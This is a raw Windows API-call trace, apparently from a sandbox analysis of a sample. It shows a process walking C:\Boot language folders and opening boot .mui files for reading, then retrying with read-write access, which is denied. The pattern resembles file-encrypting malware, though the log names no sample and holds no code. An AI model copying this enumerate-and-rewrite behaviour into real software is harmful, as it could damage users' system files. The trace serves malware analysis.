[0083.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0083.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0083.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0083.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0083.819] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.819] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.819] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.819] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.819] AreFileApisANSI () returned 1 [0083.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\pl-PL\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\pl-PL\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.819] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.819] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0083.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0083.820] AreFileApisANSI () returned 1 [0083.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0083.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 30 [0083.820] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.820] GetFileType (hFile=0x340) returned 0x1 [0083.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.976] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.977] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.977] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.977] CloseHandle (hObject=0x340) returned 1 [0083.977] AreFileApisANSI () returned 1 [0083.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0083.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 30 [0083.977] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.977] GetLastError () returned 0x5 [0083.977] GetLastError () returned 0x5 [0083.977] SetLastError (dwErrCode=0x5) [0083.977] GetLastError () returned 0x5 [0083.977] SetLastError (dwErrCode=0x5) [0083.977] GetLastError () returned 0x5 [0083.978] SetLastError (dwErrCode=0x5) [0083.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.978] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0083.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0083.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0083.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0083.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0083.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0083.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0083.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.979] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.979] AreFileApisANSI () returned 1 [0083.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\pl-PL\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\pl-PL\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0083.979] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.979] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0083.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.979] AreFileApisANSI () returned 1 [0083.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0083.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pl-PL\\memtest.exe.mui") returned 30 [0083.979] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.979] GetFileType (hFile=0x340) returned 0x1 [0083.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0083.979] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.980] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.980] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.980] CloseHandle (hObject=0x340) returned 1 [0083.980] AreFileApisANSI () returned 1 [0083.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0083.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pl-PL\\memtest.exe.mui") returned 30 [0083.980] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.980] GetLastError () returned 0x5 [0083.980] GetLastError () returned 0x5 [0083.980] SetLastError (dwErrCode=0x5) [0083.980] GetLastError () returned 0x5 [0083.980] SetLastError (dwErrCode=0x5) [0083.980] GetLastError () returned 0x5 [0083.980] SetLastError (dwErrCode=0x5) [0083.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0083.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0083.981] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.981] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.981] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68d68, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧뎠")) returned 0 [0083.981] FindClose (in: hFindFile=0x78110 | out: hFindFile=0x78110) returned 1 [0083.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0083.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0083.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0083.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0083.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0083.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0083.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.981] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.981] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.981] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.982] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.982] AreFileApisANSI () returned 1 [0083.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\pt-BR", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\pt-BR", lpUsedDefaultChar=0x0) returned 14 [0083.982] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.982] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0083.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.982] AreFileApisANSI () returned 1 [0083.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x887c0 [0083.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x887c0, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\pt-BR") returned 14 [0083.982] CreateFileW (lpFileName="C:\\Boot\\pt-BR" (normalized: "c:\\boot\\pt-br"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.982] GetLastError () returned 0x5 [0083.982] GetLastError () returned 0x5 [0083.982] SetLastError (dwErrCode=0x5) [0083.982] GetLastError () returned 0x5 [0083.982] SetLastError (dwErrCode=0x5) [0083.982] GetLastError () returned 0x5 [0083.982] SetLastError (dwErrCode=0x5) [0083.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.982] AreFileApisANSI () returned 1 [0083.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88798 [0083.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88798, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\pt-BR") returned 14 [0083.983] CreateFileW (lpFileName="C:\\Boot\\pt-BR" (normalized: "c:\\boot\\pt-br"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.983] GetLastError () returned 0x5 [0083.983] GetLastError () returned 0x5 [0083.983] SetLastError (dwErrCode=0x5) [0083.983] GetLastError () returned 0x5 [0083.983] SetLastError (dwErrCode=0x5) [0083.983] GetLastError () returned 0x5 [0083.983] SetLastError (dwErrCode=0x5) [0083.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.983] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.983] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.983] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.983] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0083.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0083.983] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0083.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0083.983] FindFirstFileExW (in: lpFileName="C:\\Boot\\pt-BR\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78550 [0083.984] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.984] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0083.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0083.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0083.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) 